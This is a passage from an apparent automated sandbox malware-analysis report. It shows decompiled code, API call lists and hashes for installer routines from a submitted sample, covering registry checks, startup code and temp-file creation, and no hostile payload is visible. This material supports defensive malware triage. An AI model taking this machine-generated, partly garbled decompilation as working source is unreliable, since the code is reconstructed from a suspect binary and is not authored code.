                                                                                                                                                                                                    						L12:
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                    							_v8 = 0;
                                                                                                                                                                                                    							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                    							if(_t24 == 0) {
                                                                                                                                                                                                    								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                    								L6:
                                                                                                                                                                                                    								asm("sbb eax, eax");
                                                                                                                                                                                                    								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                    								RegCloseKey(_v12); // executed
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							L7:
                                                                                                                                                                                                    							_t31 = _v8;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t31;
                                                                                                                                                                                                    				goto L12;
                                                                                                                                                                                                    			}











                                                                                                                                                                                                    0x00132572
                                                                                                                                                                                                    0x00132573
                                                                                                                                                                                                    0x00132575
                                                                                                                                                                                                    0x00132578
                                                                                                                                                                                                    0x0013257d
                                                                                                                                                                                                    0x00132627
                                                                                                                                                                                                    0x00132583
                                                                                                                                                                                                    0x00132586
                                                                                                                                                                                                    0x00132589
                                                                                                                                                                                                    0x001325eb
                                                                                                                                                                                                    0x00132607
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00132609
                                                                                                                                                                                                    0x0013261a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013261a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013258b
                                                                                                                                                                                                    0x0013258b
                                                                                                                                                                                                    0x0013259e
                                                                                                                                                                                                    0x001325b2
                                                                                                                                                                                                    0x001325ba
                                                                                                                                                                                                    0x001325cb
                                                                                                                                                                                                    0x001325d1
                                                                                                                                                                                                    0x001325d6
                                                                                                                                                                                                    0x001325da
                                                                                                                                                                                                    0x001325dd
                                                                                                                                                                                                    0x001325dd
                                                                                                                                                                                                    0x001325e3
                                                                                                                                                                                                    0x001325e3
                                                                                                                                                                                                    0x001325e3
                                                                                                                                                                                                    0x0013258b
                                                                                                                                                                                                    0x00132589
                                                                                                                                                                                                    0x0013262f
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00134096,00134096,?,00131ED3,00000001,00000000,?,?,00134137,?), ref: 001325B2
                                                                                                                                                                                                    • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00134096,?,00131ED3,00000001,00000000,?,?,00134137,?,00134096), ref: 001325CB
                                                                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,00131ED3,00000001,00000000,?,?,00134137,?,00134096), ref: 001325DD
                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00134096,00134096,?,00131ED3,00000001,00000000,?,?,00134137,?), ref: 001325FF
                                                                                                                                                                                                    • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00134096,00000000,00000000,00000000,00000000,?,00131ED3,00000001,00000000), ref: 0013261A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • System\CurrentControlSet\Control\Session Manager, xrefs: 001325A8
                                                                                                                                                                                                    • PendingFileRenameOperations, xrefs: 001325C3
                                                                                                                                                                                                    • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 001325F5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                    • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                    • API String ID: 2209512893-559176071
                                                                                                                                                                                                    • Opcode ID: ff191fef92f69942bec3b851f9353c8714ab940ee97c6c96811822bb4ce3bf12
                                                                                                                                                                                                    • Instruction ID: 53a1159ecd0bac4a69a13ed0de5484cb2c47cba055b0a55281d25938172359e7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff191fef92f69942bec3b851f9353c8714ab940ee97c6c96811822bb4ce3bf12
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C118C75942228BBDB24EB929C0EDFBBE7CEF127A1F504055F848A2000DB705F44E6A1
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 577 136a60-136a91 call 137155 call 137208 GetStartupInfoW 583 136a93-136aa2 577->583 584 136aa4-136aa6 583->584 585 136abc-136abe 583->585 586 136aa8-136aad 584->586 587 136aaf-136aba Sleep 584->587 588 136abf-136ac5 585->588 586->588 587->583 589 136ad1-136ad7 588->589 590 136ac7-136acf _amsg_exit 588->590 592 136b05 589->592 593 136ad9-136ae9 call 136c3f 589->593 591 136b0b-136b11 590->591 594 136b13-136b24 _initterm 591->594 595 136b2e-136b30 591->595 592->591 599 136aee-136af2 593->599 594->595 597 136b32-136b39 595->597 598 136b3b-136b42 595->598 597->598 600 136b67-136b71 598->600 601 136b44-136b51 call 137060 598->601 599->591 602 136af4-136b00 599->602 604 136b74-136b79 600->604 601->600 611 136b53-136b65 601->611 605 136c39-136c3e call 13724d 602->605 608 136bc5-136bc8 604->608 609 136b7b-136b7d 604->609 612 136bd6-136be3 _ismbblead 608->612 613 136bca-136bd3 608->613 614 136b94-136b98 609->614 615 136b7f-136b81 609->615 611->600 618 136be5-136be6 612->618 619 136be9-136bed 612->619 613->612 616 136ba0-136ba2 614->616 617 136b9a-136b9e 614->617 615->608 620 136b83-136b85 615->620 622 136ba3-136bbc call 132bfb 616->622 617->622 618->619 619->604 624 136c1e-136c25 619->624 620->614 621 136b87-136b8a 620->621 621->614 625 136b8c-136b92 621->625 622->624 630 136bbe-136bbf exit 622->630 626 136c32 624->626 627 136c27-136c2d _cexit 624->627 625->620 626->605 627->626 630->608
                                                                                                                                                                                                    C-Code - Quality: 51%
                                                                                                                                                                                                    			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                    				signed int* _t25;
                                                                                                                                                                                                    				signed int _t26;
                                                                                                                                                                                                    				signed int _t29;
                                                                                                                                                                                                    				int _t30;
                                                                                                                                                                                                    				signed int _t37;
                                                                                                                                                                                                    				signed char _t41;
                                                                                                                                                                                                    				signed int _t53;
                                                                                                                                                                                                    				signed int _t54;
                                                                                                                                                                                                    				intOrPtr _t56;
                                                                                                                                                                                                    				signed int _t58;
                                                                                                                                                                                                    				signed int _t59;
                                                                                                                                                                                                    				intOrPtr* _t60;
                                                                                                                                                                                                    				void* _t62;
                                                                                                                                                                                                    				void* _t67;
                                                                                                                                                                                                    				void* _t68;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				E00137155();
                                                                                                                                                                                                    				_push(0x58);
                                                                                                                                                                                                    				_push(0x1372b8);
                                                                                                                                                                                                    				E00137208(__ebx, __edi, __esi);
                                                                                                                                                                                                    				 *(_t62 - 0x20) = 0;
                                                                                                                                                                                                    				GetStartupInfoW(_t62 - 0x68);
                                                                                                                                                                                                    				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                                    				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                    				_t53 = 0;
                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                    					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                    					if(0 == 0) {
                                                                                                                                                                                                    						break;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(0 != _t56) {
                                                                                                                                                                                                    						Sleep(0x3e8);
                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t58 = 1;
                                                                                                                                                                                                    						_t53 = 1;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L7:
                                                                                                                                                                                                    					_t67 =  *0x1388b0 - _t58; // 0x2
                                                                                                                                                                                                    					if(_t67 != 0) {
                                                                                                                                                                                                    						__eflags =  *0x1388b0; // 0x2
                                                                                                                                                                                                    						if(__eflags != 0) {
                                                                                                                                                                                                    							 *0x1381e4 = _t58;
                                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							 *0x1388b0 = _t58;
                                                                                                                                                                                                    							_t37 = E00136C3F(0x1310b8, 0x1310c4); // executed
                                                                                                                                                                                                    							__eflags = _t37;
                                                                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                                                                    								goto L13;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                    								_t30 = 0xff;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_push(0x1f);
                                                                                                                                                                                                    						L00136FF4();
                                                                                                                                                                                                    						L13:
                                                                                                                                                                                                    						_t68 =  *0x1388b0 - _t58; // 0x2
                                                                                                                                                                                                    						if(_t68 == 0) {
                                                                                                                                                                                                    							_push(0x1310b4);
                                                                                                                                                                                                    							_push(0x1310ac);
                                                                                                                                                                                                    							L00137202();
                                                                                                                                                                                                    							 *0x1388b0 = 2;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						if(_t53 == 0) {
                                                                                                                                                                                                    							 *0x1388ac = 0;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t71 =  *0x1388b4;
                                                                                                                                                                                                    						if( *0x1388b4 != 0 && E00137060(_t71, 0x1388b4) != 0) {
                                                                                                                                                                                                    							_t60 =  *0x1388b4; // 0x0
                                                                                                                                                                                                    							 *0x13a288(0, 2, 0);
                                                                                                                                                                                                    							 *_t60();
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t25 = __imp___acmdln; // 0x74895b9c
                                                                                                                                                                                                    						_t59 =  *_t25;
                                                                                                                                                                                                    						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                    						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                    							_t41 =  *_t59;
                                                                                                                                                                                                    							if(_t41 > 0x20) {
                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							if(_t41 != 0) {
                                                                                                                                                                                                    								if(_t54 != 0) {
                                                                                                                                                                                                    									goto L32;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                    										_t59 = _t59 + 1;
                                                                                                                                                                                                    										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                    										_t41 =  *_t59;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                    							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                    								_t29 = 0xa;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_push(_t29);
                                                                                                                                                                                                    							_t30 = E00132BFB(0x130000, 0, _t59); // executed
                                                                                                                                                                                                    							 *0x1381e0 = _t30;
                                                                                                                                                                                                    							__eflags =  *0x1381f8;
                                                                                                                                                                                                    							if( *0x1381f8 == 0) {
                                                                                                                                                                                                    								exit(_t30); // executed
                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags =  *0x1381e4;
                                                                                                                                                                                                    							if( *0x1381e4 == 0) {
                                                                                                                                                                                                    								__imp___cexit();
                                                                                                                                                                                                    								_t30 =  *0x1381e0; // 0x80070002
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                    							goto L40;
                                                                                                                                                                                                    							L32:
                                                                                                                                                                                                    							__eflags = _t41 - 0x22;
                                                                                                                                                                                                    							if(_t41 == 0x22) {
                                                                                                                                                                                                    								__eflags = _t54;
                                                                                                                                                                                                    								_t15 = _t54 == 0;
                                                                                                                                                                                                    								__eflags = _t15;
                                                                                                                                                                                                    								_t54 = 0 | _t15;
                                                                                                                                                                                                    								 *(_t62 - 0x20) = _t54;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                    							__imp___ismbblead(_t26);
                                                                                                                                                                                                    							__eflags = _t26;
                                                                                                                                                                                                    							if(_t26 != 0) {
                                                                                                                                                                                                    								_t59 = _t59 + 1;
                                                                                                                                                                                                    								__eflags = _t59;
                                                                                                                                                                                                    								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t59 = _t59 + 1;
                                                                                                                                                                                                    							 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L40:
                                                                                                                                                                                                    					return E0013724D(_t30);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t58 = 1;
                                                                                                                                                                                                    				__eflags = 1;
                                                                                                                                                                                                    				goto L7;
                                                                                                                                                                                                    			}


















                                                                                                                                                                                                    0x00136a60
                                                                                                                                                                                                    0x00136a6a
                                                                                                                                                                                                    0x00136a6c
                                                                                                                                                                                                    0x00136a71
                                                                                                                                                                                                    0x00136a78
                                                                                                                                                                                                    0x00136a7f
                                                                                                                                                                                                    0x00136a85
                                                                                                                                                                                                    0x00136a8e
                                                                                                                                                                                                    0x00136a91
                                                                                                                                                                                                    0x00136a93
                                                                                                                                                                                                    0x00136a9c
                                                                                                                                                                                                    0x00136aa2
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00136aa6
                                                                                                                                                                                                    0x00136ab4
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00136aa8
                                                                                                                                                                                                    0x00136aaa
                                                                                                                                                                                                    0x00136aab
                                                                                                                                                                                                    0x00136aab
                                                                                                                                                                                                    0x00136abf
                                                                                                                                                                                                    0x00136abf
                                                                                                                                                                                                    0x00136ac5
                                                                                                                                                                                                    0x00136ad1
                                                                                                                                                                                                    0x00136ad7
                                                                                                                                                                                                    0x00136b05
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00136ad9
                                                                                                                                                                                                    0x00136ad9
                                                                                                                                                                                                    0x00136ae9
                                                                                                                                                                                                    0x00136af0
                                                                                                                                                                                                    0x00136af2
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00136af4
                                                                                                                                                                                                    0x00136af4
                                                                                                                                                                                                    0x00136afb
                                                                                                                                                                                                    0x00136afb
                                                                                                                                                                                                    0x00136af2
                                                                                                                                                                                                    0x00136ac7
                                                                                                                                                                                                    0x00136ac7
                                                                                                                                                                                                    0x00136ac9
                                                                                                                                                                                                    0x00136b0b
                                                                                                                                                                                                    0x00136b0b
                                                                                                                                                                                                    0x00136b11
                                                                                                                                                                                                    0x00136b13
                                                                                                                                                                                                    0x00136b18
                                                                                                                                                                                                    0x00136b1d
                                                                                                                                                                                                    0x00136b24
                                                                                                                                                                                                    0x00136b24
                                                                                                                                                                                                    0x00136b30
                                                                                                                                                                                                    0x00136b39
                                                                                                                                                                                                    0x00136b39
                                                                                                                                                                                                    0x00136b3b
                                                                                                                                                                                                    0x00136b42
                                                                                                                                                                                                    0x00136b57
                                                                                                                                                                                                    0x00136b5f
                                                                                                                                                                                                    0x00136b65
                                                                                                                                                                                                    0x00136b65
                                                                                                                                                                                                    0x00136b67
                                                                                                                                                                                                    0x00136b6c
                                                                                                                                                                                                    0x00136b6e
                                                                                                                                                                                                    0x00136b71
                                                                                                                                                                                                    0x00136b74
                                                                                                                                                                                                    0x00136b74
                                                                                                                                                                                                    0x00136b79
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00136b7d
                                                                                                                                                                                                    0x00136b81
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00136b83
                                                                                                                                                                                                    0x00136b8c
                                                                                                                                                                                                    0x00136b8d
                                                                                                                                                                                                    0x00136b90
                                                                                                                                                                                                    0x00136b90
                                                                                                                                                                                                    0x00136b83
                                                                                                                                                                                                    0x00136b81
                                                                                                                                                                                                    0x00136b94
                                                                                                                                                                                                    0x00136b98
                                                                                                                                                                                                    0x00136ba2
                                                                                                                                                                                                    0x00136b9a
                                                                                                                                                                                                    0x00136b9a
                                                                                                                                                                                                    0x00136b9a
                                                                                                                                                                                                    0x00136ba3
                                                                                                                                                                                                    0x00136bab
                                                                                                                                                                                                    0x00136bb0
                                                                                                                                                                                                    0x00136bb5
                                                                                                                                                                                                    0x00136bbc
                                                                                                                                                                                                    0x00136bbf
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00136bbf
                                                                                                                                                                                                    0x00136c1e
                                                                                                                                                                                                    0x00136c25
                                                                                                                                                                                                    0x00136c27
                                                                                                                                                                                                    0x00136c2d
                                                                                                                                                                                                    0x00136c2d
                                                                                                                                                                                                    0x00136c32
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00136bc5
                                                                                                                                                                                                    0x00136bc5
                                                                                                                                                                                                    0x00136bc8
                                                                                                                                                                                                    0x00136bcc
                                                                                                                                                                                                    0x00136bce
                                                                                                                                                                                                    0x00136bce
                                                                                                                                                                                                    0x00136bd1
                                                                                                                                                                                                    0x00136bd3
                                                                                                                                                                                                    0x00136bd3
                                                                                                                                                                                                    0x00136bd6
                                                                                                                                                                                                    0x00136bda
                                                                                                                                                                                                    0x00136be1
                                                                                                                                                                                                    0x00136be3
                                                                                                                                                                                                    0x00136be5
                                                                                                                                                                                                    0x00136be5
                                                                                                                                                                                                    0x00136be6
                                                                                                                                                                                                    0x00136be6
                                                                                                                                                                                                    0x00136be9
                                                                                                                                                                                                    0x00136bea
                                                                                                                                                                                                    0x00136bea
                                                                                                                                                                                                    0x00136b74
                                                                                                                                                                                                    0x00136c39
                                                                                                                                                                                                    0x00136c3e
                                                                                                                                                                                                    0x00136c3e
                                                                                                                                                                                                    0x00136abe
                                                                                                                                                                                                    0x00136abe
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00137155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00137182
                                                                                                                                                                                                      • Part of subcall function 00137155: GetCurrentProcessId.KERNEL32 ref: 00137191
                                                                                                                                                                                                      • Part of subcall function 00137155: GetCurrentThreadId.KERNEL32 ref: 0013719A
                                                                                                                                                                                                      • Part of subcall function 00137155: GetTickCount.KERNEL32 ref: 001371A3
                                                                                                                                                                                                      • Part of subcall function 00137155: QueryPerformanceCounter.KERNEL32(?), ref: 001371B8
                                                                                                                                                                                                    • GetStartupInfoW.KERNEL32(?,001372B8,00000058), ref: 00136A7F
                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 00136AB4
                                                                                                                                                                                                    • _amsg_exit.MSVCRT ref: 00136AC9
                                                                                                                                                                                                    • _initterm.MSVCRT ref: 00136B1D
                                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00136B49
                                                                                                                                                                                                    • exit.KERNELBASE ref: 00136BBF
                                                                                                                                                                                                    • _ismbblead.MSVCRT ref: 00136BDA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 836923961-0
                                                                                                                                                                                                    • Opcode ID: dcf265b3e286ba74d82a0aa7a2de21a9e1596242faa7cdad3115861f6abb622d
                                                                                                                                                                                                    • Instruction ID: 5f668186950e98d73b620f5947b7ef68c8a66ff8112971bf2bd4b3c08026b7d4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: dcf265b3e286ba74d82a0aa7a2de21a9e1596242faa7cdad3115861f6abb622d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5441E271A48324EFEB259F68DC0576ABBE4FB44720F64811AF881E76D4CB744D818F91
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 631 1358c8-1358d5 632 1358d8-1358dd 631->632 632->632 633 1358df-1358f1 LocalAlloc 632->633 634 1358f3-135901 call 1344b9 633->634 635 135919-135959 call 131680 call 13658a CreateFileA LocalFree 633->635 639 135906-135910 call 136285 634->639 635->639 644 13595b-13596c CloseHandle GetFileAttributesA 635->644 645 135912-135918 639->645 644->639 646 13596e-135970 644->646 646->639 647 135972-13597b 646->647 647->645
                                                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                                                    			E001358C8(intOrPtr* __ecx) {
                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                    				intOrPtr _t6;
                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                                    				void* _t14;
                                                                                                                                                                                                    				signed char _t16;
                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                    				intOrPtr* _t27;
                                                                                                                                                                                                    				CHAR* _t33;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                    				_t33 = __ecx;
                                                                                                                                                                                                    				_t27 = __ecx;
                                                                                                                                                                                                    				_t23 = __ecx + 1;
                                                                                                                                                                                                    				do {
                                                                                                                                                                                                    					_t6 =  *_t27;
                                                                                                                                                                                                    					_t27 = _t27 + 1;
                                                                                                                                                                                                    				} while (_t6 != 0);
                                                                                                                                                                                                    				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                    				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                                                                                                                                                    				if(_t20 != 0) {
                                                                                                                                                                                                    					E00131680(_t20, _t36, _t33);
                                                                                                                                                                                                    					E0013658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                    					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                    					_v8 = _t10;
                                                                                                                                                                                                    					LocalFree(_t20);
                                                                                                                                                                                                    					_t12 = _v8;
                                                                                                                                                                                                    					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                    						goto L4;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						CloseHandle(_t12);
                                                                                                                                                                                                    						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                    						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                    							goto L4;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							 *0x139124 = 0;
                                                                                                                                                                                                    							_t14 = 1;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					E001344B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                    					L4:
                                                                                                                                                                                                    					 *0x139124 = E00136285();
                                                                                                                                                                                                    					_t14 = 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t14;
                                                                                                                                                                                                    			}













                                                                                                                                                                                                    0x001358cd
                                                                                                                                                                                                    0x001358d1
                                                                                                                                                                                                    0x001358d3
                                                                                                                                                                                                    0x001358d5
                                                                                                                                                                                                    0x001358d8
                                                                                                                                                                                                    0x001358d8
                                                                                                                                                                                                    0x001358da
                                                                                                                                                                                                    0x001358db
                                                                                                                                                                                                    0x001358e1
                                                                                                                                                                                                    0x001358ed
                                                                                                                                                                                                    0x001358f1
                                                                                                                                                                                                    0x0013591e
                                                                                                                                                                                                    0x0013592c
                                                                                                                                                                                                    0x00135943
                                                                                                                                                                                                    0x0013594a
                                                                                                                                                                                                    0x0013594d
                                                                                                                                                                                                    0x00135953
                                                                                                                                                                                                    0x00135959
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013595b
                                                                                                                                                                                                    0x0013595c
                                                                                                                                                                                                    0x00135963
                                                                                                                                                                                                    0x0013596c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135972
                                                                                                                                                                                                    0x00135974
                                                                                                                                                                                                    0x0013597a
                                                                                                                                                                                                    0x0013597a
                                                                                                                                                                                                    0x0013596c
                                                                                                                                                                                                    0x001358f3
                                                                                                                                                                                                    0x00135901
                                                                                                                                                                                                    0x00135906
                                                                                                                                                                                                    0x0013590b
                                                                                                                                                                                                    0x00135910
                                                                                                                                                                                                    0x00135910
                                                                                                                                                                                                    0x00135918

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00135534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001358E7
                                                                                                                                                                                                    • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00135534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00135943
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,00135534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0013594D
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00135534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0013595C
                                                                                                                                                                                                    • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00135534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00135963
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
